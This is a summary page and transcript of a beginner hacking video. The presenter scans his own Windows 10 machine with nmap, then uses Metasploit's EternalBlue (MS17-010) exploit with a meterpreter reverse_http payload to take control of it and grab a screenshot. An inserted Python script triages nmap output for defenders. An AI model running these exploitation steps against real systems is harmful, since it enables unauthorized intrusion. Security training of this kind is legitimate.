Metasploit For Beginners - How To Scan And Pwn A Computer | Learn From A Pro Hacker
Summary
TLDR: This episode of 'Hub Hack' demonstrates how to identify vulnerabilities in computer systems for unauthorized access. The tutorial covers using nmap to scan for open services, Metasploit for finding exploits, and exploiting SMB vulnerabilities like 'Eternal Blue' to gain control of a Windows system. It concludes with a warning about the importance of securing services to prevent such breaches, encouraging viewers to stay vigilant about cybersecurity.
Takeaways
- 😀 The video is an educational tutorial on hacking techniques to find vulnerabilities in computer systems.
- 🔍 It teaches how to use nmap to scan a computer system for running services and look for vulnerabilities.
- 💻 The presenter demonstrates the process on a Windows 10 computer by checking the IP address with 'ipconfig'.
- 🚀 The tutorial covers how to use nmap to identify open ports and services, such as SMB, which can be exploited.
- 🔑 It explains the importance of identifying the version of services to find specific exploits.
- 🕵️♂️ Metasploit is introduced as the exploitation framework used to check for vulnerabilities and launch attacks.
- 🔎 The video shows how to search for SMB-related modules in Metasploit to find potential exploits.
- 🔄 The use of 'auxiliary scanner' in Metasploit is demonstrated to check if the system is vulnerable to SMB attacks.
- 💡 The script references the infamous 'Eternal Blue' exploit, associated with the WannaCry ransomware attack.
- 🤖 The tutorial guides through setting up an exploit in Metasploit, including setting the target IP and payload.
- 🖼️ After gaining access, the video shows how to migrate the shell to a different process to capture the screen of the compromised system.
- 🛡️ The presenter emphasizes the importance of being cautious with the services running on one's computer system for security.
Q & A
What is the main topic of the video script?
-The main topic of the video script is about finding vulnerabilities in computer systems to gain unauthorized access and control over the entire system.
What tool is used to scan a computer system for services and vulnerabilities?
-The tool used to scan a computer system for services and vulnerabilities is Nmap.
What is the purpose of the 'nmap -sV' command?
-The 'nmap -sV' command is used to determine the version of the services running on the open ports of a scanned host.
What is SMB and why is it significant in the context of the video?
-SMB stands for Server Message Block, a protocol that allows file and printer sharing across computers. It is significant because the script discusses exploiting vulnerabilities in SMB services to gain access to a computer system.
What is Metasploit and how does it relate to the video script?
-Metasploit is an exploitation framework used to identify, exploit, and validate vulnerabilities. In the video script, it is used to check if the computer system is vulnerable to certain types of attacks.
What is the 'ms17010' vulnerability mentioned in the script?
-The 'ms17010' vulnerability, also known as 'EternalBlue', is a critical SMB vulnerability that was exploited in widespread ransomware attacks. It allows remote code execution on affected systems.
What does the script suggest doing after finding the version of services with Nmap?
-After finding the version of services with Nmap, the script suggests using Metasploit to check if the computer system is vulnerable to attacks specific to those service versions.
What payload is used in the script to exploit the 'ms17010' vulnerability?
-The script uses 'windows/meterpreter/reverse_http' as the payload to exploit the 'ms17010' vulnerability.
What action is taken after a successful exploitation to gain control of the computer system?
-After a successful exploitation, the script demonstrates migrating the shell to a different process and taking a screen capture of the entire computer system to show that full control has been achieved.
What is the final message of the video script regarding computer security?
-The final message of the video script is a warning to be careful about the services running on computer systems, emphasizing the importance of cybersecurity.
Outlines
💻 Introduction to Hacking Techniques
This paragraph introduces a tutorial on hacking, specifically how to find vulnerabilities in computer systems to gain unauthorized access. The host demonstrates the use of nmap to scan for open services on a target computer and discusses the importance of identifying weaknesses in these services. The tutorial aims to teach viewers how to find exploits and utilize them to access a computer system, starting with a practical example of scanning a Windows 10 computer for open ports and services.
🔍 Scanning and Exploiting SMB Vulnerabilities
The second paragraph delves into the process of scanning for and exploiting SMB (Server Message Block) vulnerabilities, which are commonly found in Windows systems and can be used for file and printer sharing. The host explains how to use nmap to identify the version of SMB services running on a target machine and then introduces Metasploit, an exploitation framework, to search for and utilize SMB-related exploits. The paragraph covers the use of specific Metasploit modules to check for vulnerabilities, such as the infamous 'Eternal Blue' exploit, and demonstrates how to execute an attack to gain control over the target system. The host also shows how to migrate the shell to a different process for further actions, such as taking a screenshot of the target's desktop, emphasizing the seriousness of leaving services vulnerable to such attacks.
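A defender's reading of the same nmap -sV step, as an added example that is not part of the video or this summary: it parses the port table nmap prints and turns the SMB (139/445) and RDP (3389) exposure the video relies on into remediation items a sysadmin can act on. The sample scan output and the exposure policy are constructed for this example and modelled on the ports named in the video.

```python
import re

# Constructed sample of "nmap -sV" normal output, modelled on the ports the
# video finds on its Windows 10 host (not captured from the video itself).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.168.0.186
Host is up (0.0012s latency).
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
2869/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3389/tcp open  ms-wbt-server Microsoft Terminal Services
"""

# One nmap port line: "<port>/<proto>  <state>  <service>  <version...>"
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$")

# Hypothetical exposure policy: which open ports a defender should act on.
# 139/445 are the SMB services the video's MS17-010 check targets.
POLICY = {
    139: ("SMB (NetBIOS session)",
          "Block at the host firewall unless file sharing is required; "
          "confirm the MS17-010 patch is installed and SMBv1 is disabled."),
    445: ("SMB (direct-hosted)",
          "Same as 139: patch MS17-010, disable SMBv1, restrict 445 to trusted subnets."),
    3389: ("RDP", "Expose only via VPN or IP allow-list; enforce NLA and MFA."),
}


def parse_nmap_ports(text):
    """Return [(port, proto, state, service, version)] for each port line."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            ports.append((int(port), proto, state, service, version))
    return ports


def triage(text):
    """Map open ports covered by POLICY to findings a defender can act on."""
    findings = []
    for port, proto, state, service, version in parse_nmap_ports(text):
        if state != "open" or port not in POLICY:  # closed/filtered ports are not exposure
            continue
        name, action = POLICY[port]
        findings.append({"port": port, "service": name,
                         "banner": f"{service} {version}".strip(), "action": action})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_NMAP_OUTPUT):
        print(f"{f['port']}/tcp {f['service']}: {f['banner']}\n  -> {f['action']}")
```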
Keywords
💡Hacking
💡Vulnerabilities
💡Nmap
💡Services
💡SMB (Server Message Block)
💡Exploits
💡Metasploit
💡Payload
💡MS17010
💡Eternal Blue
💡Meterpreter
Highlights
Introduction to finding system vulnerabilities for unauthorized access.
Teaching how to scan a computer system for running services and vulnerabilities.
Using nmap to scan a computer for available services and potential exploits.
Demonstration of nmap scanning on a Windows 10 computer.
Explanation of how to bypass firewalls during nmap scanning.
Identification of open ports and services such as SMB.
SMB (Server Message Block) explained for file and printer sharing.
Finding the version of services to identify specific vulnerabilities.
Launching Metasploit for further exploitation of the system.
Searching for SMB-related modules in Metasploit.
Utilizing auxiliary scanners to check for SMB vulnerabilities.
The significance of the SMB MS17010 vulnerability in past ransomware attacks.
How to use Metasploit to check for specific SMB vulnerabilities.
Selecting and configuring an exploit for the SMB MS17010 vulnerability.
Executing the exploit to gain access to the target computer system.
Demonstration of migrating the shell to a different process for further actions.
Capturing and saving a screenshot of the target's desktop.
Emphasizing the importance of securing services running on computer systems.
Conclusion and call to action for feedback, likes, shares, and subscriptions.
Transcripts
Hi and welcome back to another episode on Hub Hack, and today I'll be teaching you about how you can find holes in a computer system that can give you access and take over the entire computer completely. Don't believe me? Let's go.

So in the session today what we'll be learning is how we can scan a computer system for different kinds of services they're running and are looking for vulnerabilities in those systems, so looking for weaknesses in those services that can then give us access to find exploits that are available, making sure that this computer system is susceptible to those attacks, which we can then utilize those exploits to give us access into the computer system. I will teach you about how you can do it quickly.

So right in front of us I have Kali Linux running and I can go ahead and enter terminal. All right, so I can zoom a little more so it's easier for you to see. So the first thing we can do is to go ahead and use nmap to scan a specific computer so that we can find those services available and then look for exploits that are in affiliation with those vulnerabilities, so that we can exploit it and give us access into the entire computer system. So the first thing you can do: over here I have a Windows 10 computer running and I can go ahead and enter ipconfig, and right here as I scroll up further I can see the IPv4 address. So in this case our target IP address is 192.168.0.186. So all I got to do right now is go under nmap and enter 192.168.0.186, hit enter on this and we'll begin the scanning using nmap. So nmap is a network mapping service that can help us investigate and probe a computer to check for services, check for versions, check for different types of accesses that we can perhaps even try to gain access into.

All right, and the first thing you notice here is that the host seems down; if it is really up but blocking our ping probes, try -Pn. All right, so what is happening here is that there is a Windows firewall that is running, right, which is the result of us being unable to complete a default scan. So all you're going to do now is enter -Pn (dash, capital P, n), hit enter on this and we'll now begin, right, the scanning, and the address will be marked as up, and of course the scan time will take a little longer. And in this case we can identify the following: all right, we have 135 as a port number, we have 139 as netbios-ssn, 445, 2869 as well as 3389. All right, so we can see all these different kinds of services that are opened up.

So what we can do next is to do an investigation about all the specific ports, and what I can tell you for sure is that because you are so familiar with the different types of services, because of your background in network administration and system administration, you know, all right, without even further checking, that 139 and 445 are actually services associated with SMB. Right, so what is SMB? SMB is Server Message Block, so it allows file sharing, literally file and printer sharing, that's being enabled on computers, and a lot of computers actually have, all right, SMB running, in Windows computers particularly, and as a result there are protection weaknesses that you can try to exploit to gain access to it.

So what I can do next is to find out the version of those particular services. So you can enter -sV (dash s followed by a capital V), hit enter on this, and it will try to help us find out specific versions in association with those services that are open in a host. All right, so right here we can try to figure out what is going on in this particular computer. All right, so we have the following, more detailed version of it, and we have the host name now, all right, and we have the Windows, we have the workgroup information and so on. So this gives us more precise feedback about the kind of services that are actually opened up.

So what I can do next is to go ahead and start Metasploit, which is our exploitation framework that would give us access into the entire computer system. All right, so I'll go ahead and enter sudo msfconsole, hit enter on this and I can enter my password, and once I load up my exploit framework we can then check the computer system to see if it's vulnerable to certain types of attacks. All right, so what I can do now is to go ahead and enter search and then I can enter smb. All right, so this is exactly what we're looking out for. So in this case we have a lot of different kinds of modules that we can run to check the computer system. All right, so we can scroll all the way up and look at all these different methods that we can utilize as part of the hack, and we can see over here we have exploits, we have auxiliary scanner and so on.

So what I can do next is to teach you about how you can actually search more precisely in Metasploit. So what we can do now is enter grep, followed by scanner, followed by search smb, hit enter on this, and it will just show us all those results that only contain scanner. And in this case we can see auxiliary scanner, and what we're doing now is to check whether this particular system is vulnerable to SMB attacks. All right, so here we have smb_ms17_010. Do you remember back in the days when there was a huge outbreak of ransomware attacks? So they were utilizing this specific, all right, scanning method as well as exploitation to gain access into the entire computer system. All right, so right here what I can do next is go ahead, all right, and enter use auxiliary/scanner/smb/smb_ms17_010, hit enter on this, and enter show options. All right, so this will show us all the options that we have to key in as part of checking whether this specific computer can be vulnerable to this attack. So all I got to do now is enter set RHOSTS and the IP address that we're targeting, 192.168.0.186. So you may have your own IP address as part of the attack. So once you're done right here, all you got to do is to go and hit enter: run, hit enter on this, and it states the following scary stuff: host is likely vulnerable to MS17-010.

So I'm going to pause here for a moment, and what we are trying to do right now so far is to scan the device for services they're running and also to look out for potential vulnerabilities that are associated with those services in the computer, okay, and next is to find the exploit available so that we can gain direct access back to the computer, giving us full control of the entire computer system, okay.

So what I can do next is to go ahead, all right, and search for smb. Okay, so we have smb and we can look out for all those modules available with smb, and of course what we can do even better is to go ahead and enter grep, and now what we are trying to do is to look for exploits, so I enter grep exploit search smb, hit enter on this, and we have a number of exploits available for us to use and utilize as part of running the attack. All right, so all I can see here, scroll up all the way back to the top, right, so we have multi/http, windows/smb and so on, and what we are trying to find here is an exploit that can help us launch an attack directly against this service: exploit/windows/smb/ms17_010_eternalblue, all right, or you can also use exploit/windows/smb/ms17_010_psexec. So I'll go ahead and select this, all right, enter use followed by exploit, paste selection, hit enter on this, okay, and we can enter show options. And right here we have the number of options that we need to key in, so the main option is RHOST, so go ahead and enter the IP address; so this is the target machine that we're going after, so enter set RHOST 192.168.0.186, hit enter on this. So we have set the RHOST right now, and all we got to do right now is to go ahead and set a particular payload. All right, so we can enter set payload, you can double-tab on this and it will show you all the available payloads that you can utilize as part of running the attack. Okay, so in this case what I can do is enter set payload, and we can use, say for example, windows/ and double-tab on it and look at all the other possibilities that we can utilize, okay. So in this case we have meterpreter, all right, so let's try to use meterpreter for this case, right, so we can use windows/meterpreter, double-tab on it and see what else we got, and we can now use, for example, reverse_http, hit enter on this, enter show options, and now we're going to set the LHOST, and LHOST has already been set for us, so that's great, fantastic, a lot of automation on it. So all I got to do now is enter exploit, and let's see what happens. Hit exploit on this and we can see right here, right now we have the meterpreter session 1 opened, which means we are literally in, we have hacked into the computer system and we are now in full control of the entire computer.

I can enter sysinfo, hit enter on this, and we can see the system information inside the computer right now. I can enter help and this will show us all the commands and instructions that we can send directly into the Windows computer. So what's next is I can migrate this shell that we've got, this meterpreter shell that we've gotten, into a different process, which will then allow us to take a screen capture of the entire computer system. So all I'm gonna do now is enter, for example, okay, ps to see all the list of services inside the computer system, all right, and this will show us all the processes they're running, and I can enter migrate and we can migrate to, say, 4020, which is OneDrive.exe. Okay, so I go ahead and hit enter on this because it is currently running as a user, which is Loy Leongyan, so again I'm hacking myself, so don't worry, I will not be hacking you. Go ahead and hit enter on this and now we're migrating the process over, and right here, okay, once we've completed the migration I can enter, all right, the following: I can enter screenshot, hit enter on this, and we will save a copy of the entire desktop screen to the following. All right, so I can go ahead and open up this file, right, so I click on the top left corner, I open the folder, all right, and right here I can see the file has been saved, and I can double click on it on the following. All right, we got this particular file that's been saved, double clicked on it, and right here we can see we're in, we have full control of the entire computer system. Isn't that scary? So you got to be really careful about what kind of services you have running inside all your computer systems.

So once again I hope you learned something valuable in today's tutorial. If you have any questions please leave a comment below and I'll try my best to answer any of your questions. Remember, like, share and subscribe to the channel so that you can keep abreast of the latest cybersecurity tutorials. Thank you so much once again for watching.